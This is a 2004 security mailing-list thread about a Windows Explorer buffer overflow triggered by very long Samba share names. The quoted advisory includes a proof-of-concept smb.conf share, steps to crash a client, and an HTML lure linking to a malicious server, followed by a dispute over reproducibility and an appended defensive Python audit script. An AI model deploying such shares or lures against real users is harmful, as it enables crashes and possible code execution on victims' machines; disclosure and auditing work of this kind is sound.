Message-ID: <20040426230008.29566.qmail@web12702.mail.yahoo.com>
Date: Mon, 26 Apr 2004 18:00:08 -0500 (CDT)
From: Daniel Regalado Arias <dan57170@...oo.com>
To: Rodrigo Gutierrez <rodrigo@...ellicomp.cl>,
   full-disclosure@...ts.netsys.com, info@...uriteam.com,
   bugtraq@...urityfocus.com, submissions@...ketstormsecurity.org
Subject: Re: RE: Microsoft's Explorer and Internet Explorer long share name buffer overflow.


Well, look, Gutierrez, I have a Samba server
working correctly on my network, and I did indeed
set up an existing share, not the one you propose,
obviously with a valid user, and in fact in
Explorer the name with the 300 'A' characters
shows up;
it won't let me in, but it doesn't crash either.

That's it!!!!!

 --- Rodrigo Gutierrez <rodrigo@...ellicomp.cl> wrote:
> Then you probably didn't do it right, me and others
> such as the secunia people
> (www.secunia.com) have tested this
> Vulnerability and proved that the systems are
> vulnerable. Even Microsoft
> says that the vulnerability was not patched
> Until w2k sp4.
> 
> I tested this vulnerability on the following fully
> patched systems:
> 
> Windows 98            (Vulnerable)
> Windows Me            (Vulnerable)
> Windows NT (All)      (Vulnerable)
> Windows 2k (All)      (Vulnerable)
> Windows XP (All)      (Vulnerable)
> Windows 2003 server   (Not Vulnerable)
> 
> Remember that if you want to test the vulnerability,
> first you must know how
> Samba works.   It's not just pasting the example
> config into an smb.conf file; you must create the
> directory that the share points to
> and perhaps have a valid user.
> 
> Regards
> 
> 
> Rodrigo.-
> 
> 
> -----Original Message-----
> From: Daniel Regalado Arias
> [mailto:dan57170@...oo.com] 
> Sent: Monday, April 26, 2004 16:56
> To: Rodrigo Gutierrez;
> full-disclosure@...ts.netsys.com;
> bugtraq@...urityfocus.com;
> submissions@...ketstormsecurity.org;
> info@...uriteam.com
> Subject: Re: Microsoft's Explorer and Internet
> Explorer long share name
> buffer overflow.
> 
> Well, I have tested it on W2k with SP3 and Explorer
> didn't crash!!!!!!!
> 
> Well, I can't get into the share because a message
> appears saying "share name
> not found"!!!!
> 
> But Explorer is OK.
> 
> 
>  --- Rodrigo Gutierrez <rodrigo@...ellicomp.cl>
> wrote: > Sunday afternoon is a bit boring, and
> weather sucks
> > down here in Santiago,
> > Chile so here we go...
> > The vuln is attached in TXT format, I would be
> grateful if someone 
> > could verify if it affects windows 2003 as well.
> > 
> > Rodrigo.-
> > > Microsoft Explorer and Internet Explorer Long
> Share
> > Name Buffer Overflow.
> > 
> > 
> > 
> > Author: Rodrigo Gutierrez <rodrigo@...ellicomp.cl>
> > 
> > Affected: MS Internet Explorer, MS Explorer
> > (explorer.exe) 
> >           Windows XP(All), Windows 2000(All)
> > 
> > Not Tested: Windows 2003, Windows me, Windows 98,
> Windows 95
> > 
> > Vendor Status: I notified the vendor in the
> beginning of 2002; this
> >                vulnerability was supposed to be
> fixed in XP Service
> >                Pack 1 according to the vendor's
> Knowledge Base article
> >                322857.
> > 
> > Vendor url:
> >
>
http://support.microsoft.com/default.aspx?scid=kb;en-us;322857
> > 
> > 
> > 
> > Background.
> > 
> > MS Explorer (explorer.exe) and MS Internet
> > Explorer(IEXPLORE.EXE) are
> > core pieces of Microsoft Windows Operating
> Systems.
> > 
> > 
> > 
> > Description
> > 
> > Windows fails to handle long share names when
> accessing remote file 
> > servers such as Samba, allowing a malicious server
> to crash the 
> > client's Explorer and eventually get to execute
> arbitrary code on the 
> > machine as the current user (usually with
> Administrator rights on 
> > Windows machines).
> > 
> > 
> > 
> > Analysis
> > 
> > In order to exploit this, an attacker must be able
> to get a user to 
> > connect to a malicious server which contains a
> share name equal to or 
> > longer than 300 characters. Windows won't allow you
> to create such a 
> > share, but of course Samba
> > includes the feature ;).   After your Samba box is
> > up and running, create a
> > share in your smb.conf:
> > 
> > 
> > 
> > #------------ CUT HERE -------------
> > 
> >
>
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
> > comment = Area 51
> > path = /tmp/testfolder
> > public = yes
> > writable = yes
> > printable = no
> > browseable = yes
> > write list = @trymywingchung
> > 
> > #------------ CUT HERE -------------
> > 
> > 
> > After your server is up, just get to your Windows
> test box and go to 
> > the Start menu > Run >
> \\your.malicious.server.ip., plufff, Explorer 
> > will crash :).
> > 
> > Social Engineering:
> > 
> > <a href="\\my.malicious.server.ip">Enter My 0day
> sploit archive</a>
> >  
> > 
> > 
> > Workaround.
> > 
> > From your network card settings, disable the Client
> for Microsoft 
> > Networks until a real fix for this vulnerability
> is available.
> >  
> 

_________________________________________________________
Do You Yahoo!?
News from the United States and Latin America, on Yahoo! News.
Visit us at http://noticias.espanol.yahoo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
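An added example, not part of this thread or of Samba's own tooling: a Python audit that walks the share sections of an smb.conf and flags any share name that reaches the advisory's 300-character threshold, so an administrator can catch such a name on their own server (or in a config review) before Windows clients of that era trip over it. The sample configuration, the function names and the safe limit constant are constructed for this example.

```python
"""Audit a Samba smb.conf for over-long share names (added example)."""
import configparser
from typing import List, Tuple

# Threshold taken from the advisory: names "equal to or longer than 300 characters".
MAX_SAFE_SHARE_NAME = 300

# Samba service sections that are not ordinary shares and need no name check.
SPECIAL_SECTIONS = {"global", "homes", "printers"}


def parse_smb_conf(text: str) -> configparser.ConfigParser:
    """Parse smb.conf text. Samba accepts both ';' and '#' as comment leaders."""
    cp = configparser.ConfigParser(
        interpolation=None,        # smb.conf uses %U, %m etc.; keep them literal
        allow_no_value=True,
        comment_prefixes=("#", ";"),
        strict=False,              # tolerate duplicate keys, as smbd does
    )
    cp.read_string(text)
    return cp


def find_long_share_names(text: str, limit: int = MAX_SAFE_SHARE_NAME) -> List[Tuple[str, int]]:
    """Return (share_name, length) for every share whose name length is >= limit."""
    hits = []
    for name in parse_smb_conf(text).sections():
        if name.lower() in SPECIAL_SECTIONS:
            continue
        if len(name) >= limit:
            hits.append((name, len(name)))
    return hits


# Constructed sample: one ordinary share and one whose name is 300 'A's,
# mirroring the shape of the share shown in the advisory.
SAMPLE_CONF = """
[global]
workgroup = WORKGROUP
[public]
path = /srv/public
[%s]
comment = Area 51
path = /tmp/testfolder
browseable = yes
""" % ("A" * 300)

if __name__ == "__main__":
    for name, length in find_long_share_names(SAMPLE_CONF):
        print("share name of %d chars reaches the unsafe limit: %s..." % (length, name[:16]))
```

Run it against a real server's smb.conf by reading the file into a string and passing it to find_long_share_names.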

